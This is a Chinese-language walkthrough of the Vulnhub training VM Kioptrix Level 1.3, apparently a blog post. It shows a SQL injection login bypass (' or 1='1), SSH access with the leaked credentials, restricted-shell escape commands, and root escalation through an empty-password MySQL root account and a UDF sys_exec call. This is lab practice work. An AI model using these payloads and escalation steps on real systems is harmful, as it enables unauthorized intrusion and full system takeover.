Vulnhub靶机系列：Kioptrix: Level 1.3 (#4)

这次的靶机是Vulnhub靶机：Kioptrix: Level 1.3 (#4)

靶机地址及相关描述

靶机地址：https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

靶机设置

这个靶机需要自己新建一个空的虚拟机

移除现在的硬盘，用靶机替换，开机。老规矩，用netdiscover和curl确定一下目标已经OK。
我的靶机ip为192.168.190.188

利用知识及工具

sql注入、ssh、mysql错误配置、dirb

信息收集并getshell

浏览首页，首页就是登录界面

可以直接想到爆破或者sql注入，不过爆破动静太大，一般不做第一考虑因素，先试万能密码
万能密码原理
加入有个sql语句select name,pass from tbAdmin where name='admin' and pass='123456'
那假如我们输入密码为' or 1='1
就会变成select name,pass from tbAdmin where name='admin' and pass='' or 1='1‘，这样的话永为真
在尝试Admin和' or 1='1时成功

大意时成员账户有问题，让我联系管理员,很懵逼
dirb扫下目录，dirb http://192.168.190.188

发现一个john目录，看下
点进去发现
注意url，所以我们把这个和之前登录页面的结合一下，看看结果,注意这里有个坑，要把之前的amdin退出

但是这玩意不像是后台管理页面，所以继续寻找信息，扫下端口 nmap -p 1-65535 192.168.190.188

可以看到有ssh，所以试试刚才的账户信息能不能登录sshssh [email protected]
成功连接，但是发生了蛋疼的问题

解决办法,生成一个tty，以下是几个方式

python -c ‘import pty; pty.spawn(“/bin/bash”)’
echo os.system('/bin/bash') 
/bin/sh -i

拿到shell

提权

我这里提权还是使用脚本完成，收集信息的脚本，没啥收获
这个网站的架构是LAMP，那么看看mysql那里有没有突破口

cd /var/www
ls

发现check最可疑

空密码，emmmmmm，换用mysql登录，这里参考老外的两篇文章https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
http://superuser.com/questions/400723/how-do-i-create-a-superuser-from-the-command-line-in-ubuntu

select sys_exec('usermod -a -G admin john');
exit
sudo su

总结

提权真的太，，，不能盲信脚本工具，最可靠的还是百度